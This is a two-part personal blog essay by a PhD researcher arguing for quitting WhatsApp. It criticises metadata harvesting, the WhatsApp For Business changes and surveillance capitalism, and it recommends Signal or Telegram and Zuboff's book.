In tech parlance, metadata is referred to by the euphemism “breadcrumbs” (a noun that deceptively emphasises the innocuous and insignificant nature of this type of data). Google discovered early on that users left collateral behavioural data (the breadcrumbs) behind when they searched, and that the breadcrumbs could be aggregated and fed into machine learning to get really deep insights into who we are. Those insights go well beyond what we think we reveal when we live our life online. This collateral behavioural data is the “gold” of the internet. 

The discovery above marked the birth of “targeted advertising”, another euphemism for the enterprise of surveillance that has grown exponentially and largely unchecked since the early 2000s. It’s not what you say online (content), it’s the traces you leave that count (metadata). For more, see Shoshana Zuboff under “resources” below (if you read only one book on this topic, let it be hers).

A Narrow Definition of Privacy 

When we, users, think of privacy, we think about the content of the information we share online. But a quick look at WhatsApp’s Privacy Policy (see link below) makes two things clear:

  1. metadata (not content) is the core commodity being harvested. 
  2. we have no say in what and how our data is collected, how it is treated and what it is being used for.

Under the “Information We Collect” heading, there are 3 paragraphs. Interestingly, the first one is called “Information You Provide”, hinting that the other two are information that you do NOT (and may not want to) provide. Indeed, they are: “Automatically Collected Information” and “Third Party Information”. 

Here is an excerpt: “Device and Connection Information. We collect device-specific information when you install, access, or use our Services. This includes information such as hardware model, operating system information, browser information, IP address, mobile network information including phone number, and device identifiers.” It is really interesting to read through https://www.whatsapp.com/legal/privacy-policy if you have not already done so.

NB: WhatsApp Terms of Service and Privacy Policies change with time. I posted the PDF and some excerpts of the document as of 27 March 2021 in a post above.

REAL IMPLICATIONS OF WHATSAPP FOR BUSINESS

What’s Really Behind WhatsApp For Business?

As you probably know, WhatsApp has been sharing metadata from your chats with its parent company Facebook for some time already. The changes in T&C are meant to allow WhatsApp For Business (WFB) to get off the ground. 

What does it mean? On the face of it, WFB is merely a tool to help businesses “better communicate” with us, their customers. Officially, Facebook tells us that it just means that businesses will be able to chat with you, give you information on their products, follow up on your purchases and give you “better” customer service. But if you think about it, most of that could already be achieved before WFB. By opening the possibility for transactions on WhatsApp, WFB will allow Facebook to get extraordinarily granular collateral behavioural data on aspects of our lives it had only indirect, limited or no access to before.

What Business?

One thing you may want to contemplate: what does “business” mean in “WhatsApp For Business”? Retail brands, certainly, and this seems innocuous enough. But not only those (and by the way, what seems innocuous to you is not so innocuous once it goes through the analytical capacities of Big Data). “Business” may also cover health-related communications and transactions. You may not mind if Facebook peeks into your interactions with a fashion brand, but how would you like it to have granular access to your exchanges with businesses selling health devices, with health practitioners (which may include how much and how often you spend on treatments), insurers, money lenders, financial institutions and more? Do you really think that Facebook ought to have access to details from your credit card and bank account statements (a statement shows who you paid, when, and how much, so essentially FB will have access to your statements)? 

IMPLICATIONS

Commodification of users 

I sometimes hear people say: “if you do not pay for a service online, you are the product”. It is true in spirit, but not completely. The massive enterprise of data extraction shows that we (users) have become not the product but the cheap commodity. From this, FB and Google extract the raw material they use to create the valuable products they sell, not only to advertisers but, to be honest, to anyone who is willing to pay for them, whatever their intention. In other words, we are the pigs, not the Iberico ham.

An Enterprise of Territorialisation

Another aspect of the enterprise of digital surveillance can be summed up in two words: “never enough”. The internal competitive logic of the targeted advertising model drives those corporations to ceaselessly expand in order to acquire ever-more predictive collateral behavioural data. Since we still live (slivers of) our lives offline, it is not enough to surveil our lives online, so the tactics used online are seeping into the physical world. 

Our bodies are the next frontier (in January 2021, Google paid $2.1 billion for Fitbit, a company that makes bracelets that record health and fitness data). Sensors, wearables, our bodies have become territories to conquer. How do you claim that territory? By creating new needs and new habits. 

Wearables and sensors in the physical world (think “smart” cities) can detect changes that happen in your body below the dermal layer. How is that for an invasion of privacy? Who gets all that data about your heart rate and the number of steps you take and how many times you wake up at night? Where does that information go? What happens to that data after it is collected? Who decides what to do with it? Who benefits in the end? Do you know? And more importantly do you mind? 

AN ECOLOGICAL CRISIS

Why It Is Urgent to Take Action 

We got where we are today because the unprecedented nature of these developments has obfuscated what was really going on (see Zuboff for more on this). In 2021, though, it is hard to ignore that we have reached a point where we can’t afford to be complacent.

In 1962, environmentalist Rachel Carson wrote Silent Spring, a compelling call for the world to wake up to the large-scale slaughtering of our environment through the commodification of nature by large corporations with unmatched lobbying power. Today, we are doing to human experience what we started doing to nature 60 years ago.

Reconfigurations of Power

First, it is an ecological crisis in the distribution of power. The digital developments of the past 20 years have created massive asymmetries of knowledge. In other words, Google and Facebook know heaps about us, but we know very little about them. The algorithms that orchestrate the online life of several billion people across the planet are considered proprietary trade secrets. These massive asymmetries of knowledge lead to massive asymmetries of power.

This is compounded by the void in the legal framework surrounding these issues. An army of in-house lawyers unilaterally controls our contractual relationship with some platforms which in many ways have become public spaces. The only alternative to full acceptance is not to use the service. And a second army of “communication experts” and lobbyists carefully craft the official narrative (the definition of privacy is only one example). 

Crisis of the Ecology of Knowledge

But there is another more insidious and less talked about implication. The commodification of users is leading to a major epistemological catastrophe. The reductionist approach to human experience (i.e., to quantify purely qualitative aspects of our lives, and discard what cannot be quantified) is corrupting what we know, and how we know what we know. It is an ecological crisis of knowledge of the sort only seen once in a millennium (more about that in another post). 

MISCONCEPTIONS

Everyone on the Web Collects Data, so Why Bother?

Now, coming back to where we started, I hope I have given some avenues of reflection as to why quitting WhatsApp may not be such a bad idea after all. However, I want to address one concern that I heard many times in the past couple of months. 

Some people told me: “if I move to Telegram or Signal, they will also collect my data, so what’s the point?” That’s a very valid question. While it is true that data collection is widespread online (we have all heard about cooking apps collecting your device ID and geolocation), not everything is created equal, so we need to use our power of discrimination.

First, Telegram and Signal collect much less metadata than WhatsApp (or Facebook Messenger). In fact, Signal only collects your phone number. You can easily check this: just like you brush your teeth in the morning, it is a good habit to check what metadata the apps you use get from you. But that’s not all. 

Exercise Our “WE” Muscle

Second, we need to exercise our “we” muscle instead of solely relying on our “I” muscle. As I mentioned above, this is an ecological issue. Self-centred thinking is not a luxury we can afford anymore. If social media have taught us anything, it is that we are intricately interconnected and that the decisions we make individually have global consequences. This is true for the environment; this is also true for the digital environment. 

Be selective in whose business you patronise, because as you do, you are participating in creating the world that we will leave to the next generations. In other words, do not underestimate the positive ripple effects from an individual decision to use an equivalent app outside of the Facebook domain (and that applies to Google as well by the way). As I said in my previous post, if you leave, some people in your network will also leave. The network effect works in favour of platform monopoly but it can also work against it. 

Final Word: Personal Convenience Is Not a Judicious Ground for Action

One last word. Some will decide to remain on WhatsApp not because they trust Facebook but simply for convenience. This is one option. Social platforms are built for convenience (in design parlance it is called “user experience” or UX for short), because they know that convenience drives users’ lethargy. To follow this argument, it is also more convenient to throw garbage through your car window, release harmful chemicals in rivers rather than in purifying facilities, and throw plastic bottles in the ocean rather than in recycling plants. Personal convenience is not always the most judicious ground for action. 

RESOURCES

I am starting a Datafication & Technology blog to keep writing about these issues (www.datafication.space). Post, comment or send me questions (datafication.space AT protonmail.com) on topics you would like to see treated.

GENERAL RESOURCES

SPECIFIC TOPICS

  • To read more on the historical developments, the mechanisms and the ideological premises of Surveillance Capitalism, check “The Age of Surveillance Capitalism” by Shoshana Zuboff, Professor Emerita at Harvard Business School, who has researched technology since the 1970s. The book has made such a splash since it came out that it now has a Wikipedia entry (https://en.wikipedia.org/wiki/The_Age_of_Surveillance_Capitalism). Zuboff has given a string of interviews, and you can easily find those online. 

Why I am quitting WhatsApp – Part I (13 January 2021)

For the past 5 years, I have been doing PhD research on large social platforms. I want to share a few thoughts on why I am quitting WhatsApp before February 8th 2021. 

As you probably heard by now, WhatsApp is changing its Terms & Conditions as of 8th of February, 2021. Furthermore, as is customary with Facebook companies, the move is unilateral, and if users do not accept the new terms, they will lose access to their accounts. There are two things you want to be very clear about when you make your decision to remain on the platform: what “data” and “privacy” mean, and why WhatsApp is making the change. 

WHAT DO DATA & PRIVACY MEAN?

It is not the first assault on our privacy in the race to control the use of our data. WhatsApp has been sharing information with Facebook, its parent company, for a while. However, this change opens the door for major, more intrusive and more unilateral changes that violate the privacy and the dignity of their users. We all know about the privacy issues that come with social platforms. We all know that FB collects our data. But the real questions are: what is this data we are talking about? FB claims that “privacy” is built into their DNA, but how do they define privacy?

Over the years, FB has been very careful to maintain ambiguity about this and has adopted a very narrow definition. They equate data with CONTENT, i.e. WHAT we say in the messages we exchange, and equate privacy with not having access to that content. They say that WhatsApp supports end-to-end encryption, so even WhatsApp does not have access to the content of what we write; therefore, they respect our privacy. 

This is a FALLACY. The data that FB and WhatsApp want is not the content (what we write), but data on our behaviours when we are on their platform: where we are, who we contact, how long we stay on the platform, who we message most, at what time, who is in our network, etc. This data is called “breadcrumbs”, because it is a kind of side effect that happens when we use their main service. But it is the most valuable data because, when it is aggregated and analysed by supercomputers (what is called Big Data), it gives Facebook very deep insights into you: who you are, your personality, what presses your buttons, your body, your health, your mental state, your wishes, and many things that you would not want other people to know about you, and rightfully so. 

I often hear people say that “Facebook sells our data”, but Facebook says they don’t, and it is true! They do not sell our data; they sell something much more valuable than our raw data. They use our data as raw material to create computer-ready products that they sell on their platform, not only to advertisers but to whoever wants to buy them (governments, extremists, third parties trying to influence elections… you name it). In other words, we, the users, have become not the product but the raw material, the cheap commodity. We are called “users”, but a better name would be the “USED”. (If you want to know more about this, read Shoshana Zuboff’s “The Age of Surveillance Capitalism”, a powerful eye opener!)

WHY THE CHANGE?

So why is WhatsApp making the changes now? 

First, because Facebook wants to monetise WhatsApp. Think about it as an expensive piece of real estate with just a small house on it. Even if the house is quite nice, that piece of land is not optimised. Facebook wants to create a universe that is so all-encompassing that users never need to leave it. It wants to be the “WeChat of the West”, a place where, ultimately, you will be able to socialise, communicate with your friends, share moments, work out, buy stuff, send money, follow your favourite brands or celebrities, fall in love, manage your health and bank accounts or credit cards etc. In other words, Facebook wants you to live your life through Facebook. Why? Well, data of course!

Second, because Facebook wants to integrate WhatsApp so deeply into the Facebook family that it will soon be impossible (or very difficult) for regulators to break them up. Think about it as baking a cake. Once the flour and the eggs and the sugar have become the cake, you can’t get the eggs back. Facebook is under scrutiny from governments in several countries. The EU already set up the GDPR, a regulation on data protection and privacy, in 2016. In the US, there is strong bipartisan concern, and Facebook is being investigated for abuse of dominance and anti-competitive conduct, with the idea of possibly breaking it up. But as I said, once the cake is baked, it is really tricky to get the eggs back… 

SO WHAT SHALL I DO?

In the past week or so, many people have downloaded Telegram and Signal, two WhatsApp-like apps that provide instant messaging services. But I also hear a lot of people say they will stay on WhatsApp even though they downloaded the new apps. 

“I will stay on WhatsApp for now but I will quit later.” This is exactly what Facebook is counting on, because they know one fact about human psychology: we are essentially creatures of habit, and once we are used to doing something in a certain way, it takes a lot of effort to change it (ask smokers how easy they find it to stop smoking). Right now, there is a knee-jerk reaction: we download Signal or Telegram and it makes us feel better and safer. But in one month’s time, when another piece of breaking news occupies our (limited) mental space, all will go back to the way we have always done it, i.e. “I’ll WhatsApp you!” 

“I can’t quit WhatsApp, all my friends/clients are there.” True, with over 2 billion users, your friends, family, clients and their cats and dogs are probably all on WhatsApp. But the argument above is the snake biting its own tail. If people leave WhatsApp, people will leave WhatsApp. I am quite certain that you would be surprised if you checked how many people around you actually do have an account on another major messaging app, or are ready to download it and make the switch! (I certainly was.) 

So for all those reasons, it’s Farewell WhatsApp for me. And I am looking forward to life without Facebook with curiosity and anticipation! 
